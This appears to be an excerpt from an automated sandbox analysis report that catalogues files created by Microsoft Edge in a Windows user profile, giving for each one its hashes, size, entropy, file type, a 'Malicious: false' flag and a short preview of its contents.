MD5:	9CEA17ABF868AF53A23FBBED0954DDFA
SHA1:	A2F64547F3786F863BE5D49CF513B1295E4A6733
SHA-256:	A11DACE751CD7FC2632E629BE6178F61C3FA0A2CA863A438AA72EA13437CB100
SHA-512:	CE062356E1F9D7437708E4078A8B7D8CDF2B75AC6FEFF8D32C456F67694D6316AAEAF4A0B3C8E52D7CBDED74B1D59B6ED1020FD89249E5BAB4027407E1846835
Malicious:	false
Preview:	...@..@...@.....C.].....@............... a...`..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?.......".idruil20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............%..................-...w..U?:K...G...W6.>.........."....."...24.."."93dRcxCw0cDlBQeAYE33nFACeirrSGEv1FXdrR8ueYg=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....Mb.XiP@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.125497125339749
Encrypted:	false
SSDEEP:	3:FiWWltlT0EiCjG2xo6kMWPGdV8B+BVP/Sh/JzvXEAAG34tTAUFVHTtotll:o1AGGwwMWj+BVsJDkG3V8aX
MD5:	23B51B4E5DFFE7365D4CD24B78F3EE6A
SHA1:	1B2BC5936AF81B58469B80909F8820D2D7FBDE1E
SHA-256:	8A0F790721FD76AC2E2A2A648605751F9F092880B10E0D7C2466D8397AD0421A
SHA-512:	B6F30AD39A919479CA5F85096F5528F84BF6C010ADFDE48F0591D7277234FC02F73404F0E1AC0CF911704AEBDF38973784C13741911FDDB2A27DDFB6F02B95CC
Malicious:	false
Preview:	sdPC.......................c.CsJ......5"93dRcxCw0cDlBQeAYE33nFACeirrSGEv1FXdrR8ueYg="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................e9a6470b-82e9-4451-b995-4e1980b580b6............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\24b4cc5e-3eb3-4050-8a00-77269114d86f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40470
Entropy (8bit):	5.5610937428588185
Encrypted:	false
SSDEEP:	768:oWnvUc7pLGLhpPWPIefrh8F1+UoAYDCx9Tuqh0VfUC9xbog/OVX2I/4Bzrw7/GsD:oWnvUAchpPWPIefrhu1ja+2IQBI7/GSx
MD5:	08D09F9C05C68439B821AD3192C782B2
SHA1:	398A964079D56B42A024ED8261FF734F79111FF4
SHA-256:	42C5551FEBE4422A2BD8D99ED32BD21944FF5E58EA10CBE5989BDC3E1E115600
SHA-512:	B3C526F5A85DB4E7FC06C2522E2E084713F0F26DBC237390964F8029972B941E4FCAB0475DAABEE394CBDC7547A699BA79179A976A4054B9BBFD0140D133A331
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379026162363098","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379026162363098","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\44f88baf-4118-4ab9-a125-0214c10ef730.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6eacb581-bcc3-4a5f-b36e-879bb8182dc2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\73b348fd-8d03-4b2c-b445-69b72f68f405.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9681
Entropy (8bit):	5.1005894189254946
Encrypted:	false
SSDEEP:	192:stgkdp8sIrwIJZVkm0X8nbV+FnwOLQABCN2PpYJ:stgQ8sIrwiZ9bGrQF
MD5:	978A7C7EC7C7B9F335761FCEEBA166C4
SHA1:	E34E4D2A5EB36354E5C8B20C08C829BCB8F6AED9
SHA-256:	E83AC6F3A2D4ACD28373DF63E0AD8246C43292B17F97A3216B82950B7BC002F4
SHA-512:	68130E103F3BD6562332A33A791DD116855A2553B5B85B1CEDAC805622C618C75D7705D81CFA038B3FEB7BE47EA7BC2034797A1901B8CF0A0A2B8446EA5155DA
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379026162989307","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340970644573687","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\76c5e2e8-6c51-4c79-b67f-b55a4c8a5c37.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	28366
Entropy (8bit):	5.557663355667755
Encrypted:	false
SSDEEP:	768:o/pvWc7pLGLhePWPIefCh8F1+UoAYDCx9Tuqh0VfUC9xbog/OVa/4qzrw9Cbx/E5:o/pvWAchePWPIefChu1jaXQqI9Gte
MD5:	A0D49B7BDE872557669B7D0BD650441C
SHA1:	C6FA64F4FA4F97D9C8D5895F1DC23D94FDF3FD40
SHA-256:	3C7A5D021A652C88B1DDEC0BCF9842F0F3D20870536CFFF5A56005B5B8E9382D
SHA-512:	ED87E5DFEF54DAA9A80FB7D8930819C6E1A70C9EE9946B910D4279DA047BC6A0F1A74AAF4F141823B62752D93561BAD72866C224354A6E58151FC739841C205E
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379026162363098","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379026162363098","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8f1181f8-ad54-4a33-a93e-827c234514e2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (16788), with no line terminators
Category:	dropped
Size (bytes):	16789
Entropy (8bit):	5.437103511236475
Encrypted:	false
SSDEEP:	192:stgJ99QTryDiuabatSuyp8sIrwIJZVkfNP6sKADn11mhE4zlqJKrX8nbV+FnwOL8:stgPGQSu48sIrwiZxsxwmbGrQws
MD5:	E54A5F92E022B7EF6579B4ED7482574B
SHA1:	051D63BB64F2E8D755EE485E53DCA8BE1F143770
SHA-256:	9EC1E4A7CA078EE834494F111551F1A47D8198BF512641CD93514EA43CF5F43C
SHA-512:	5F095361559C2BF54ED607E47C431BD1B9CE10E02FC4908E68E84493D8A82E59173379226A229EB0739A2287C3729E048154D7EAF8A9BEDC02FAEED9DAA52C89
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379026162989307","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340970644573687","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	305
Entropy (8bit):	5.262917064819124
Encrypted:	false
SSDEEP:	6:7PQ+yC1qLTwi23oH+Tcwtp3hBtB2KLlpPQ+ytrN+q2PqLTwi23oH+Tcwtp3hBWsh:7oVnwZYebp3dFLToV1N+v8wZYebp3eF2
MD5:	D5BF31DAF36086172C6883FE989AF682
SHA1:	F62694A62C46A8218C2EBF744E53B4B3DCAEFE18
SHA-256:	5B7CE6DF8E7E57E36D2C9A9F6EDA7E985D75ACD49761043257D2A4F83B9B732E
SHA-512:	2C2CCD2FE8FB1151C1B4BE17F32D5D0A13595A9A61FB429EB899CEF185A17F51565134B7231A0B94EC7F3B763F19BB9473606F52694558E2D2C908056F8C0C56
Malicious:	false
Preview:	2024/12/18-15:09:27.232 160c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/18-15:09:27.266 160c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	1696115
Entropy (8bit):	5.040594253052053
Encrypted:	false
SSDEEP:	24576:7nf76gGkISshcFdmcOAoPENUpifYP+MbI2T:7nfgAmmE
MD5:	559B86693E003FDFFDEA9AA4301C300E
SHA1:	2B9043D2A6398E2115FA2CAFCC0C4BAE10F5A6F4
SHA-256:	BF7EB54D9ABB49377CEE4735C133C505C41BFE0E03C35D6759ADBA99A481D7E0
SHA-512:	E3F24017078E2B0CDF91D2F3D41B3D2D20E5BA9B51ECB35F0185DD4A176B0441BA6D8AE6B5085687246015C164E964AB05B232D741EA0833C5312A6E47E6FD8F
Malicious:	false
Preview:	...m.................DB_VERSION.1acT..................QUERY_TIMESTAMP:arbitration_priority_list4...13340969984833782.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.166192275438081
Encrypted:	false
SSDEEP:	6:7PQ+QLVq2PqLTwi23oH+Tcwt9Eh1tIFUt8OPQ+QZgZmw+OPQ+CuXsIkwOqLTwi2w:7otVv8wZYeb9Eh16FUt8Oo/g/+OoMXse
MD5:	05E85069080B2D785F064D5248B722C7
SHA1:	D0E0C6E5C974D3B02590D9ED3DDB062427309495
SHA-256:	F063825BB193C86578451A620DAB2390EDBCE20830FF7079F1A54E1E898E5611
SHA-512:	BFEB86EB52897E5EC619231EA68AAE68BF707CD738180A8C18B4CBC0D591756841C818399F8392580484404D6640323A830808205C6394FDEBBDA741CA5912DD
Malicious:	false
Preview:	2024/12/18-15:09:27.134 1260 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/18-15:09:27.136 1260 Recovering log #3.2024/12/18-15:09:27.147 1260 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.166192275438081
Encrypted:	false
SSDEEP:	6:7PQ+QLVq2PqLTwi23oH+Tcwt9Eh1tIFUt8OPQ+QZgZmw+OPQ+CuXsIkwOqLTwi2w:7otVv8wZYeb9Eh16FUt8Oo/g/+OoMXse
MD5:	05E85069080B2D785F064D5248B722C7
SHA1:	D0E0C6E5C974D3B02590D9ED3DDB062427309495
SHA-256:	F063825BB193C86578451A620DAB2390EDBCE20830FF7079F1A54E1E898E5611
SHA-512:	BFEB86EB52897E5EC619231EA68AAE68BF707CD738180A8C18B4CBC0D591756841C818399F8392580484404D6640323A830808205C6394FDEBBDA741CA5912DD
Malicious:	false
Preview:	2024/12/18-15:09:27.134 1260 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/18-15:09:27.136 1260 Recovering log #3.2024/12/18-15:09:27.147 1260 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.46254092591349727
Encrypted:	false
SSDEEP:	24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu50X2:TouQq3qh7z3bY2LNW9WMcUvBuZ
MD5:	F18E08C7599B29CF46AB8934D3244925
SHA1:	10CDC207065857ECB6827FE8DCD0FB60D8996E6E
SHA-256:	8AF3D4796C230FC82F74689676A09ADFB9E53F55285B5AE27C676B66A326F1C4
SHA-512:	76EB70FFFD15380813876C86E9A02636345DF547D23410A36A7D0704EA604C23BECD3433A6CDD39314EC0EE20A4492D7D63D4CF75A5B120CFE5566BB7B788CEF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.8708334089814068
Encrypted:	false
SSDEEP:	12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
MD5:	92F9F7F28AB4823C874D79EDF2F582DE
SHA1:	2D4F1B04C314C79D76B7FF3F50056ECA517C338B
SHA-256:	6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
SHA-512:	86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	344
Entropy (8bit):	5.193533771896286
Encrypted:	false
SSDEEP:	6:7PQ+fv+q2PqLTwi23oH+TcwtnG2tMsIFUt8OPQ+fAZZmw+OPQ+fANVkwOqLTwi25:7obv8wZYebn9GFUt8OoXZ/+OoXz5TwZ5
MD5:	BD7D6F6C536BD610D07B092F58465A5B
SHA1:	33C3146066C54CC212F50AA53853C896B599D36F
SHA-256:	9626B44DA3619523736F192C129D7182A5F191F09F469D3E0E108CAB41BFBBD3
SHA-512:	F30C3C8F894B698A20A18D5661E8A226FFFF5B67152DC756471B8F596230AE083DBF05123A63AB58DB9536875C86097733C9F5518E5E3D967AFB9E72AA63D631
Malicious:	false
Preview:	2024/12/18-15:09:22.398 1a28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/18-15:09:22.399 1a28 Recovering log #3.2024/12/18-15:09:22.399 1a28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	344
Entropy (8bit):	5.193533771896286
Encrypted:	false
SSDEEP:	6:7PQ+fv+q2PqLTwi23oH+TcwtnG2tMsIFUt8OPQ+fAZZmw+OPQ+fANVkwOqLTwi25:7obv8wZYebn9GFUt8OoXZ/+OoXz5TwZ5
MD5:	BD7D6F6C536BD610D07B092F58465A5B
SHA1:	33C3146066C54CC212F50AA53853C896B599D36F
SHA-256:	9626B44DA3619523736F192C129D7182A5F191F09F469D3E0E108CAB41BFBBD3
SHA-512:	F30C3C8F894B698A20A18D5661E8A226FFFF5B67152DC756471B8F596230AE083DBF05123A63AB58DB9536875C86097733C9F5518E5E3D967AFB9E72AA63D631
Malicious:	false
Preview:	2024/12/18-15:09:22.398 1a28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/18-15:09:22.399 1a28 Recovering log #3.2024/12/18-15:09:22.399 1a28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6138612561608496
Encrypted:	false
SSDEEP:	24:TLapR+DDNzWjJ0npnyXKUO8+jxupb4WmL:TO8D4jJ/6Up+VM4z
MD5:	ECBEA091EF1EBEA6D0255A884DE0F2D3
SHA1:	2D07ECE8130C286900E0220BFC80F9439AD125D3
SHA-256:	DFA4EC2B72C1B2A67458EE20DBBB952F7F719795785F2D2FDEDC7F9F6EE1737B
SHA-512:	7B5014853895EA941D9EE6DBE95592115A41BFD477B1DC058E2EBC9FFF2B562A7EDF10C1CDB29D364EC2F81AB2A76929586B7D2F99648711A35E0EC935799655
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	375520
Entropy (8bit):	5.354098379600965
Encrypted:	false
SSDEEP:	6144:oA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:oFdMyq49tEndBuHltBfdK5WNbsVEziPU
